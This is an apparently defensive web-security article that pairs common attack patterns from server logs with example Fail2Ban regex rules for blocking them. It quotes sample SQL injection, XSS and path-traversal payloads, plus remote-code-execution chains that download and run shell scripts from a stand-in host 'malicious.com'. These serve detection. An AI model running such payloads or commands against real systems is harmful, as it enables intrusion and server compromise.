In the world of web security, understanding common attack vectors is essential to safeguarding websites and services. This article explores some of the most common attacks, including those frequently observed in server logs. By being aware of these attacks, administrators can take appropriate measures to protect their websites. Often, hundreds of rules are needed to cope with various attacks, and this article only provides insight into some of the common attack vectors. It is by no means a complete list of attack vectors or solutions, as there can be many different types and variations.
SQL Injection is an attack that involves inserting or manipulating SQL queries in a web application’s database. Attackers use this technique to execute unauthorized SQL commands by exploiting vulnerabilities in input fields.
Common patterns observed:
' OR '1'='1 — This injects an always-true
condition.sleep(5) — Attempts to delay the response by executing
the sleep() function.XOR operators — Often used to manipulate query logic,
e.g., ' XOR 1=1.Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*['"]*(sleep\(|xor\().*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Cross-Site Scripting is an attack where malicious scripts are injected into trusted websites. These scripts can steal cookies, impersonate users, or manipulate site content.
Common XSS patterns include:
<script>alert('XSS')</script>
— A simple example to trigger an alert.<img src=x onerror=alert('XSS')> —
Injecting an <img> tag with an onerror event.Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(\<script\>|onerror=|javascript:).*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Remote Code Execution allows attackers to execute arbitrary code on the server. This type of attack often uses command chaining to run multiple commands, which can lead to system compromise.
Examples of command chains:
cd /tmp && wget http://malicious.com/shell.sh; chmod +x shell.sh;
./shell.sh/bin/bash -c 'curl -s http://malicious.com/some_script.sh | bash'Attackers may use tools like wget, curl, or chmod
to download and execute malicious scripts.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(wget|curl|chmod\s\+x).*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Path traversal involves accessing unauthorized directories and files, often
using sequences like ../ to navigate the file system.
Examples include:
GET /../../etc/passwd — Attempts to read the /etc/passwd
file.GET /bin/sh — Attempts to access a shell executable directly.Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(\../).*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Automated bots often probe websites to find vulnerabilities or exploit known ones. They may use brute force techniques to guess credentials or scan for specific vulnerable paths.
Examples of bot activity:
GET /wp-login.php — Attempts to access WordPress login
pages.GET /admin.php — Bots attempting to access common admin
panels.python-requests/2.26.0 indicate automated
scripts.Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*/wp-login\.php.*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Many attacks target known vulnerabilities in third-party software. If a website runs software like Joomla, WordPress, or even web interfaces like OpenWrt’s LuCI, attackers will attempt to exploit them.
Examples:
GET /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php
— A common exploit targeting Joomla components.GET /autodiscover/autodiscover.json — Attempting to exploit
vulnerabilities in Microsoft Exchange.Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*/components/com_jnews/.*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
Attackers often look for files and folders that shouldn’t exist, like configuration files or outdated software paths.
Examples:
GET /.env — Attempts to access environment configuration
files.GET /wp/, GET /blog/, GET /temp/
— Probing for common directories.These attacks often use HTTP 200 or 301 responses
to determine if the path exists, even if the intended behavior should have been
a 404 response.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*(/wp/|/blog/|/temp/).*HTTP/.*"Note: This is an example and may not be “drop in code” for production environments.
DoS attacks often include making numerous requests to invalid pages, resulting in a large number of 404 responses in a short period of time. This can lead to server resource exhaustion.
Fail2Ban Regex Example:
failregex = ^<HOST> -.*"(GET|POST) .*HTTP/.*".* 404Note: This is an example and may not be “drop in code” for production environments.
One of the attack types that is often seen in server logs involves requests with binary data or malformed requests, which can exploit vulnerabilities in poorly configured servers or software.
GET "\x00\x0E8V\xEB\xF0\xF2>\x06\xDE\xAD\x00\x00\x00\x00\x00"These requests are generally crafted to confuse or break the underlying software, making it behave unpredictably or exposing vulnerabilities.
failregex = ^ -.*".*\\x[0-9A-Fa-f]{2}.*".*"-" "-" This regex aims to detect and block requests containing hexadecimal byte values, often used for fuzzing or binary payload delivery.
Note: This is an example and may not be “drop in code” for production environments.
Blocking attacks is essential to maintaining the integrity and security of web services. Failing to protect a server against these common attack vectors can lead to unauthorized access, information theft, or complete service failure. In the case of DDoS-type attacks, servers can easily run out of resources, such as bandwidth, CPU, and memory, rendering them unavailable to legitimate users. Properly configured rules, such as those demonstrated here, help mitigate a wide range of attacks. However, it is important to recognize that no solution is perfect. Maintaining effective protection requires constant vigilance, updating rules, and adjusting configurations as new threats emerge.